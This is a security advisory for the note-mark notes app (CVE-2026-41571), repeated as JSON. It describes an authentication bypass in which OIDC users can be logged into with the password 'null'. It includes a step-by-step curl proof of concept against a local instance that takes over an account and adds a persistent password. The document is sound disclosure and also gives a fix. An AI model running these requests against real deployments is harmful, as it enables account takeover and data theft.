GHSA-PXF8-6WQM-R6HH

Vulnerability from github – Published: 2026-04-25 23:40 – Updated: 2026-05-07 20:20
VLAI
Summary
Note Mark: OIDC-registered users authenticated by submitting password "null"
Details

Summary

IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits password: "null" to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction.

Details

backend/db/models.go:36 defines the placeholder hash used by the timing-attack mitigation inside IsPasswordMatch:

var nullPasswordHash, _ = bcrypt.GenerateFromPassword([]byte("null"), bcrypt.DefaultCost)

IsPasswordMatch (backend/db/models.go:46-58) substitutes that placeholder when the stored password is empty:

func (u *User) IsPasswordMatch(plainPassword string) bool {
    var current []byte
    if len(u.Password) == 0 {
        // prevent CWE-208
        current = nullPasswordHash
    } else {
        current = u.Password
    }
    if err := bcrypt.CompareHashAndPassword(current, []byte(plainPassword)); err == nil {
        return true
    }
    return false
}

OIDC-registered users are stored with an empty password at backend/services/auth.go:102-115:

return db.DB.Transaction(func(tx *gorm.DB) error {
    user := db.User{
        Username: username,
        Password: []byte(""),
    }
    // ...
})

The internal login endpoint (POST /api/auth/token, handled at backend/services/auth.go:20-54) calls IsPasswordMatch with the caller-supplied password. For any OIDC-only user, bcrypt.CompareHashAndPassword(nullPasswordHash, []byte("null")) returns nil, the function returns true, and the server issues a Auth-Session-Token cookie.

EnableInternalLogin defaults to true, and GET /api/info discloses both OIDC configuration and internal-login status. enableAnonymousUserSearch also defaults to true, so an unauthenticated caller enumerates usernames via GET /api/users/search before touching the login endpoint.

Once the session is issued, PUT /api/users/me/password accepts existingPassword: "null" because the same IsPasswordMatch routine verifies the existing password. The caller writes a new password onto the OIDC user's row, which locks the legitimate OIDC user out on the next internal-login path.

Proof of Concept

Tested against note-mark v0.19.2.

Step 1: Start note-mark pointed at any OIDC provider and set OIDC__ENABLE_USER_CREATION=true. The defaults for ENABLE_INTERNAL_LOGIN and ENABLE_ANONYMOUS_USER_SEARCH do not need to be changed.

docker run -d --name note-mark-poc \
  -e OIDC__PROVIDER_NAME=example \
  -e OIDC__CLIENT_ID=note-mark \
  -e OIDC__CLIENT_SECRET=secret \
  -e OIDC__ISSUER_URL=https://your-oidc-provider/ \
  -e OIDC__ENABLE_USER_CREATION=true \
  -p 8088:8080 ghcr.io/enchant97/note-mark-backend:0.19.2

Step 2: Alice registers via the OIDC flow. TryCreateNewOidcUser stores her row with Password = []byte("").

Step 3: Bob confirms the preconditions.

curl -s http://localhost:8088/api/info
# {"allowInternalLogin":true,"oidcProvider":"example","enableAnonymousUserSearch":true,...}

Step 4: Bob logs in as Alice via the internal endpoint.

curl -i -X POST http://localhost:8088/api/auth/token \
  -H 'Content-Type: application/json' \
  -d '{"grant_type":"password","username":"alice","password":"null"}'

Response:

HTTP/1.1 204 No Content
Set-Cookie: Auth-Session-Token=eyJ...; Path=/; HttpOnly; SameSite=Strict

Step 5: Bob uses the cookie to read Alice's account.

curl -b 'Auth-Session-Token=eyJ...' http://localhost:8088/api/users/me
# {"id":"...","username":"alice","name":"Alice"}

Step 6: Bob persists access by writing his own password onto Alice's row.

curl -i -b 'Auth-Session-Token=eyJ...' -X PUT \
  http://localhost:8088/api/users/me/password \
  -H 'Content-Type: application/json' \
  -d '{"existingPassword":"null","newPassword":"bob-owns-this-now"}'
# HTTP/1.1 204 No Content

Alice's next internal-login attempt fails; her OIDC flow still works, but Bob now holds a second valid credential on the same row.

A companion script that drives all six steps ships at pocs/poc_014_null_password_bypass.sh.

Impact

Every OIDC-only user on a note-mark deployment with ENABLE_INTERNAL_LOGIN=true (the default) is one HTTP request from takeover. Bob reads Alice's private notebooks, her note markdown, and her uploaded assets. He writes, edits, or deletes anything Alice owns. Step 6 grants persistent access and costs Alice her account until the maintainer clears the row by hand.

The default configuration ships both authentication paths side by side, so any site that turns on OIDC is affected without further misconfiguration on the operator's part.

Recommended Fix

The clearest fix rejects the login path for rows with no stored password. Add the check after the user lookup in GetAccessToken:

// backend/services/auth.go:28
var user db.User
if err := db.DB.
    First(&user, "username = ?", username).
    Select("id", "password").Error; err != nil {
    user.IsPasswordMatch(password) // preserve CWE-208 timing mitigation
    return core.AccessToken{}, InvalidCredentialsError
}

if len(user.Password) == 0 {
    return core.AccessToken{}, InvalidCredentialsError
}

if !user.IsPasswordMatch(password) {
    return core.AccessToken{}, InvalidCredentialsError
}

The equivalent change belongs in UpdateUserPassword at backend/services/users.go:53-61, since the same routine verifies existingPassword during the persistence step.

Replacing nullPasswordHash with a per-instance unguessable plaintext closes the hole too, but relies on the placeholder staying secret:

// backend/db/models.go:36
var nullPasswordHash, _ = bcrypt.GenerateFromPassword([]byte(uuid.NewString()), bcrypt.DefaultCost)

The explicit empty-password check is preferable because the intent is readable in the source.

Found by aisafe.io

Severity
9.4 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/enchant97/note-mark/backend"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260417132909-dea5530cc989"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41571"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-25T23:40:19Z",
    "nvd_published_at": "2026-05-04T18:16:29Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\n`IsPasswordMatch` in `backend/db/models.go` falls back to a hard-coded `bcrypt(\"null\")` placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits `password: \"null\"` to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction.\n\n## Details\n\n`backend/db/models.go:36` defines the placeholder hash used by the timing-attack mitigation inside `IsPasswordMatch`:\n\n```go\nvar nullPasswordHash, _ = bcrypt.GenerateFromPassword([]byte(\"null\"), bcrypt.DefaultCost)\n```\n\n`IsPasswordMatch` (`backend/db/models.go:46-58`) substitutes that placeholder when the stored password is empty:\n\n```go\nfunc (u *User) IsPasswordMatch(plainPassword string) bool {\n    var current []byte\n    if len(u.Password) == 0 {\n        // prevent CWE-208\n        current = nullPasswordHash\n    } else {\n        current = u.Password\n    }\n    if err := bcrypt.CompareHashAndPassword(current, []byte(plainPassword)); err == nil {\n        return true\n    }\n    return false\n}\n```\n\nOIDC-registered users are stored with an empty password at `backend/services/auth.go:102-115`:\n\n```go\nreturn db.DB.Transaction(func(tx *gorm.DB) error {\n    user := db.User{\n        Username: username,\n        Password: []byte(\"\"),\n    }\n    // ...\n})\n```\n\nThe internal login endpoint (`POST /api/auth/token`, handled at `backend/services/auth.go:20-54`) calls `IsPasswordMatch` with the caller-supplied password. For any OIDC-only user, `bcrypt.CompareHashAndPassword(nullPasswordHash, []byte(\"null\"))` returns nil, the function returns true, and the server issues a `Auth-Session-Token` cookie.\n\n`EnableInternalLogin` defaults to `true`, and `GET /api/info` discloses both OIDC configuration and internal-login status. `enableAnonymousUserSearch` also defaults to `true`, so an unauthenticated caller enumerates usernames via `GET /api/users/search` before touching the login endpoint.\n\nOnce the session is issued, `PUT /api/users/me/password` accepts `existingPassword: \"null\"` because the same `IsPasswordMatch` routine verifies the existing password. The caller writes a new password onto the OIDC user\u0027s row, which locks the legitimate OIDC user out on the next internal-login path.\n\n## Proof of Concept\n\nTested against `note-mark` v0.19.2.\n\nStep 1: Start note-mark pointed at any OIDC provider and set `OIDC__ENABLE_USER_CREATION=true`. The defaults for `ENABLE_INTERNAL_LOGIN` and `ENABLE_ANONYMOUS_USER_SEARCH` do not need to be changed.\n\n```bash\ndocker run -d --name note-mark-poc \\\n  -e OIDC__PROVIDER_NAME=example \\\n  -e OIDC__CLIENT_ID=note-mark \\\n  -e OIDC__CLIENT_SECRET=secret \\\n  -e OIDC__ISSUER_URL=https://your-oidc-provider/ \\\n  -e OIDC__ENABLE_USER_CREATION=true \\\n  -p 8088:8080 ghcr.io/enchant97/note-mark-backend:0.19.2\n```\n\nStep 2: Alice registers via the OIDC flow. `TryCreateNewOidcUser` stores her row with `Password = []byte(\"\")`.\n\nStep 3: Bob confirms the preconditions.\n\n```bash\ncurl -s http://localhost:8088/api/info\n# {\"allowInternalLogin\":true,\"oidcProvider\":\"example\",\"enableAnonymousUserSearch\":true,...}\n```\n\nStep 4: Bob logs in as Alice via the internal endpoint.\n\n```bash\ncurl -i -X POST http://localhost:8088/api/auth/token \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"grant_type\":\"password\",\"username\":\"alice\",\"password\":\"null\"}\u0027\n```\n\nResponse:\n\n```\nHTTP/1.1 204 No Content\nSet-Cookie: Auth-Session-Token=eyJ...; Path=/; HttpOnly; SameSite=Strict\n```\n\nStep 5: Bob uses the cookie to read Alice\u0027s account.\n\n```bash\ncurl -b \u0027Auth-Session-Token=eyJ...\u0027 http://localhost:8088/api/users/me\n# {\"id\":\"...\",\"username\":\"alice\",\"name\":\"Alice\"}\n```\n\nStep 6: Bob persists access by writing his own password onto Alice\u0027s row.\n\n```bash\ncurl -i -b \u0027Auth-Session-Token=eyJ...\u0027 -X PUT \\\n  http://localhost:8088/api/users/me/password \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"existingPassword\":\"null\",\"newPassword\":\"bob-owns-this-now\"}\u0027\n# HTTP/1.1 204 No Content\n```\n\nAlice\u0027s next internal-login attempt fails; her OIDC flow still works, but Bob now holds a second valid credential on the same row.\n\nA companion script that drives all six steps ships at `pocs/poc_014_null_password_bypass.sh`.\n\n## Impact\n\nEvery OIDC-only user on a note-mark deployment with `ENABLE_INTERNAL_LOGIN=true` (the default) is one HTTP request from takeover. Bob reads Alice\u0027s private notebooks, her note markdown, and her uploaded assets. He writes, edits, or deletes anything Alice owns. Step 6 grants persistent access and costs Alice her account until the maintainer clears the row by hand.\n\nThe default configuration ships both authentication paths side by side, so any site that turns on OIDC is affected without further misconfiguration on the operator\u0027s part.\n\n## Recommended Fix\n\nThe clearest fix rejects the login path for rows with no stored password. Add the check after the user lookup in `GetAccessToken`:\n\n```go\n// backend/services/auth.go:28\nvar user db.User\nif err := db.DB.\n    First(\u0026user, \"username = ?\", username).\n    Select(\"id\", \"password\").Error; err != nil {\n    user.IsPasswordMatch(password) // preserve CWE-208 timing mitigation\n    return core.AccessToken{}, InvalidCredentialsError\n}\n\nif len(user.Password) == 0 {\n    return core.AccessToken{}, InvalidCredentialsError\n}\n\nif !user.IsPasswordMatch(password) {\n    return core.AccessToken{}, InvalidCredentialsError\n}\n```\n\nThe equivalent change belongs in `UpdateUserPassword` at `backend/services/users.go:53-61`, since the same routine verifies `existingPassword` during the persistence step.\n\nReplacing `nullPasswordHash` with a per-instance unguessable plaintext closes the hole too, but relies on the placeholder staying secret:\n\n```go\n// backend/db/models.go:36\nvar nullPasswordHash, _ = bcrypt.GenerateFromPassword([]byte(uuid.NewString()), bcrypt.DefaultCost)\n```\n\nThe explicit empty-password check is preferable because the intent is readable in the source.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-pxf8-6wqm-r6hh",
  "modified": "2026-05-07T20:20:12Z",
  "published": "2026-04-25T23:40:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41571"
    },
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/commit/dea5530cc9891187b51548ef9f2868b7dc9f4e92"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/enchant97/note-mark"
    },
    {
      "type": "WEB",
      "url": "https://github.com/enchant97/note-mark/releases/tag/v0.19.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Note Mark: OIDC-registered users authenticated by submitting password \"null\""
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.